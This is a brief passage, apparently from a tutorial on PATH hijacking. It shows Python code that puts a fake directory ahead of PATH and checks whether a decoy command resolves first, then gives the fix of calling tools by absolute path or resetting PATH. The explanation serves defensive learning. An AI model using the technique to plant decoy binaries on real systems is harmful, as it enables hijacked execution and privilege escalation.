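        hijacked_path = fake_dir + os.pathsep + os.environ.get("PATH", "")
        return shutil.which(command, path=hijacked_path) == fake

print(hijack_resolves_first())
```

The usual fix on the program's side is to call the tool by its absolute path or to reset PATH before calling system().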

Changelog